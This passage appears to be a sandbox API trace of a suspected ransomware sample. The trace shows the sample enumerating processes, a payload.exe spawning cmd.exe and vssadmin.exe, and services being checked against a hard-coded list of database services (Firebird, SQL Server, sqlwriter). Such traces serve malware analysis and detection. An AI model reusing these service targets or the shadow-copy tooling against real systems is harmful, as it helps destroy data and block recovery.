returned 11 [0046.945] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.946] lstrlenW (lpString="taskeng.exe") returned 11 [0046.946] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.947] lstrlenW (lpString="taskhost.exe") returned 12 [0046.947] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0046.947] lstrlenW (lpString="carried trinity.exe") returned 19 [0046.947] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0047.088] lstrlenW (lpString="heaven.exe") returned 10 [0047.088] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0047.096] lstrlenW (lpString="dell.exe") returned 8 [0047.096] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0047.098] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0047.098] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0047.099] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0047.099] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0047.099] lstrlenW (lpString="til ear equal.exe") returned 17 [0047.099] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0047.100] lstrlenW (lpString="itunes-bring.exe") returned 16 [0047.100] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0047.101] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0047.101] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0047.102] lstrlenW (lpString="philadelphia.exe") returned 16 [0047.102] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0047.102] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0047.102] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0047.103] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0047.103] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0047.104] lstrlenW (lpString="fraud stuck.exe") returned 15 [0047.104] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0047.104] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0047.104] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0047.105] lstrlenW (lpString="attended.exe") returned 12 [0047.105] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0047.106] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0047.106] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0047.106] lstrlenW (lpString="pan physician.exe") returned 17 [0047.106] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0047.107] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0047.107] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0047.108] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0047.108] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0047.109] lstrlenW (lpString="over-celebrity.exe") returned 18 [0047.109] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.109] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.109] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0047.110] lstrlenW (lpString="payload.exe") returned 11 [0047.110] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.111] lstrlenW (lpString="cmd.exe") returned 7 [0047.111] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.115] lstrlenW (lpString="conhost.exe") returned 11 [0047.115] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0047.135] lstrlenW (lpString="vssadmin.exe") returned 12 [0047.135] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0047.142] lstrlenW (lpString="VSSVC.exe") returned 9 [0047.143] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.143] lstrlenW (lpString="svchost.exe") returned 11 [0047.143] Process32NextW (in: hSnapshot=0x1f0, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0047.144] CloseHandle (hObject=0x1f0) returned 1 [0047.144] Sleep (dwMilliseconds=0x1f4) [0048.246] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625cd0 [0048.251] EnumServicesStatusExW (in: hSCManager=0x625cd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0048.255] GetLastError () returned 0xea [0048.256] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x628500 [0048.259] EnumServicesStatusExW (in: hSCManager=0x625cd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x628500, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x628500, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0048.268] CloseServiceHandle (hSCObject=0x625cd0) returned 1 [0048.269] lstrlenW (lpString="Appinfo") returned 7 [0048.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0048.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0048.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0048.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0048.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0048.272] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0048.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.273] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0048.273] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0048.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0048.274] lstrlenW (lpString="AudioSrv") returned 8 [0048.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0048.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0048.275] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0048.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0048.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0048.277] lstrlenW (lpString="BFE") returned 3 [0048.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0048.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0048.278] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0048.278] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0048.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0048.279] lstrlenW (lpString="CryptSvc") returned 8 [0048.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0048.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0048.281] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0048.281] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0048.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0048.282] lstrlenW (lpString="CscService") returned 10 [0048.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0048.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0048.283] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0048.284] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0048.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0048.285] lstrlenW (lpString="DcomLaunch") returned 10 [0048.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.286] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0048.286] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0048.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0048.287] lstrlenW (lpString="Dhcp") returned 4 [0048.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0048.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0048.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0048.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0048.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0048.289] lstrlenW (lpString="Dnscache") returned 8 [0048.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0048.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0048.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0048.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0048.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0048.292] lstrlenW (lpString="DPS") returned 3 [0048.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0048.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0048.293] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0048.294] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0048.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0048.294] lstrlenW (lpString="eventlog") returned 8 [0048.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0048.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0048.295] lstrlenW (lpString="EventSystem") returned 11 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0048.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0048.295] lstrlenW (lpString="gpsvc") returned 5 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0048.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0048.295] lstrlenW (lpString="iphlpsvc") returned 8 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0048.295] lstrlenW (lpString="LanmanServer") returned 12 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0048.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0048.295] lstrlenW (lpString="LanmanWorkstation") returned 17 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.295] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0048.295] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0048.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0048.295] lstrlenW (lpString="lmhosts") returned 7 [0048.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0048.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0048.296] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0048.296] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0048.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0048.296] lstrlenW (lpString="MMCSS") returned 5 [0048.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0048.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0048.296] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0048.296] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0048.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0048.296] lstrlenW (lpString="MpsSvc") returned 6 [0048.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0048.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0048.296] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0048.296] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0048.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0048.296] lstrlenW (lpString="Netman") returned 6 [0048.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0048.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0048.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0048.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0048.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0048.296] lstrlenW (lpString="netprofm") returned 8 [0048.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0048.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0048.297] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0048.297] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0048.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0048.298] lstrlenW (lpString="NlaSvc") returned 6 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0048.310] lstrlenW (lpString="nsi") returned 3 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0048.310] lstrlenW (lpString="PcaSvc") returned 6 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0048.310] lstrlenW (lpString="PlugPlay") returned 8 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0048.311] lstrlenW (lpString="Power") returned 5 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0048.311] lstrlenW (lpString="ProfSvc") returned 7 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0048.311] lstrlenW (lpString="RpcEptMapper") returned 12 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0048.311] lstrlenW (lpString="RpcSs") returned 5 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0048.311] lstrlenW (lpString="SamSs") returned 5 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0048.311] lstrlenW (lpString="Schedule") returned 8 [0048.311] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 